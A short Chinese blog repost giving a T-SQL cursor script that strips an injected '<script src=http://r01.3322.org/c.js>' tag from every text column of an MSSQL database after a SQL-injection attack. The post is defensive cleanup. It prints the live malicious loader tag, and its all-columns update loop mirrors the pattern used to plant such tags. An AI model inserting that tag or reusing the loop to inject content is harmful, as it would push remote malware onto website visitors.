在SQL查询分析器执行以下代码就可以了。

  1. declare @t varchar(255),@c varchar(255)
  2. declare table_cursor cursor for select a.name,b.name
  3. from sysobjects a,syscolumns b ,systypes c
  4. where a.id=b.id and a.xtype='u' and c.name
  5. in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext')
  6. declare @str varchar(500),@str2 varchar(500)
  7. set @str='<script src=http://r01.3322.org/c.js></script>'/*要替换的内容*/
  8. set @str2=''
  9. open table_cursor
  10. fetch next from table_cursor
  11. into @t,@c while(@@fetch_status=0)
  12. begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''+ @str2 +''')')
  13. fetch next from table_cursor
  14. into @t,@c end close table_cursor deallocate table_cursor;

首先替换代码里面的<script src=http://r01.3322.org/c.js></script>也就是红色部分为你的数据库表里面被注入的内容,打开MSSQL的SQL查询分析器执行以下代码就可以了

转载于:https://www.cnblogs.com/xiachufeng/archive/2010/06/25/1765526.html

清除SQL被注入script恶意病毒代码的语句相关推荐

  1. PHP之SQL防注入代码,PHP防XSS 防SQL注入的代码

    360提示XSS漏洞?这个XSS漏洞很不好修复.....如果是PHP程序的话,可以用下面的代码来过滤... PHP防XSS 防SQL注入的代码 class protection{public stat ...

  2. 2017年Q1安卓ROOT类恶意病毒发展趋势研究报告

    摘要 1.移动互联网黑产持续性攻击的核武器,用户设备沦陷的最后防线 Android平台作为目前最流行的流量平台,由于它的开源使得大量的厂商加入其阵营,作为当前最大的流量来源,安卓平台是黑产分子眼中的香 ...

  3. SQL防注入程序 v1.0

    /// ***************C#版SQL防注入程序 v1.0************ /// *使用方法: /// 一.整站防注入(推荐) /// 在Global.asax.cs中查找App ...

  4. SQL 登录注入脚本_常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御...

    1.SQL注入 原理: 1).SQL命令可查询.插入.更新.删除等,命令的串接.而以分号字元为不同命 令的区别.(原本的作用是用于SubQuery或作为查询.插入.更新.删除--等 的条件式) 2). ...

  5. 方立勋_30天掌握JavaWeb_JDBC、SQL防注入(一)

    JDBC简介 数据库驱动 SUN公司为了简化.统一对数据库的操作,定义了一套Java操作数据库的规范,称之为JDBC. JDBC全称为:Java Data Base Connectivity(java ...

  6. SQL手工注入入门级笔记(更新中)

    一.字符型注入 针对如下php代码进行注入: $sql="select user_name from users where name='$_GET['name']'"; 正常访问 ...

  7. sql server注入_SQL注入:SQL Server中的介绍和预防方法

    sql server注入 A SQL injection attack is one of the most commonly used hacking techniques. It allows h ...

  8. sql部分注入方式的学习

    前言 文章同步于我的个人博客https://quan9i.top/sqlway/,欢迎大家访问. 近期在进行sql注入实战的时候发现一些注入方式并不是很擅长运用,在这里对部分注入方式进行总结,希望能对 ...

  9. SQL手工注入原理(含环境搭建) ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 web安全

    文章目录 SQL测试环境环境搭建 下载与安装环境 开启与使用环境 sqli-labs环境部署 dvwa环境部署 SQL手动注入 SQL注入原理 SQL注入分类 SQL注入手段 寻找注点 利用注点 ge ...

最新文章

  1. 【numpy】中,对axis【轴】axis=0 axis=1的理解
  2. 关于CPU Cache——程序猿需要知道的那些事
  3. nacos使用_使用Nacos的CMDB实现微服务的就近访问!
  4. Exceptionless服务端本地化部署
  5. .NetCore 3.1 安装本地化中文智能提示
  6. 使用Cloudformation集成Spring Boot和EC2
  7. 语音识别-语音技术-自然语言处理
  8. 数据库原理及应用习题三
  9. Android 10.0 去掉SystemUI中的电池图标显示
  10. 简述Python垃圾回收机制
  11. 虚拟示波器软件 JSCOPE -- 使用 jlink 仿真器来查看变量
  12. 全网疯传!微信发原图暴露个人信息?微信高冷回应!真相来了...
  13. Alienware Area-51M 安装Win10+Ubuntu18.04 双系统
  14. 【LeetCode每日一题】【2021/12/8】689. 三个无重叠子数组的最大和
  15. 一个参数 nls_date_language
  16. 联想电脑重装系统总结
  17. getchar()作用
  18. 做为一个好人 你应该看这部电影
  19. “Memo桌面便笺”总结
  20. django框架下后台登录验证

热门文章

  1. JS判断相等或者不等于(==、===、!=、!==)运算符
  2. oracle sysau,ORACLE 10GR2 ASM 如何修改AU_SIZE的大小
  3. 实际开发的存储过程_实际生产中的 Android SDK开发总结| 完结
  4. yum install / yum localinstall
  5. HDU-1874畅通工程续( 最短路)
  6. C++中STL-vector的用法
  7. C++:vs2017编写代码时的光标变成了黑块,选中字时替换掉了黑块选中的字【解决办法】
  8. 驱动中定时器,taskle,工作队列编程
  9. OSError: cannot identify image file
  10. Java实现redis管道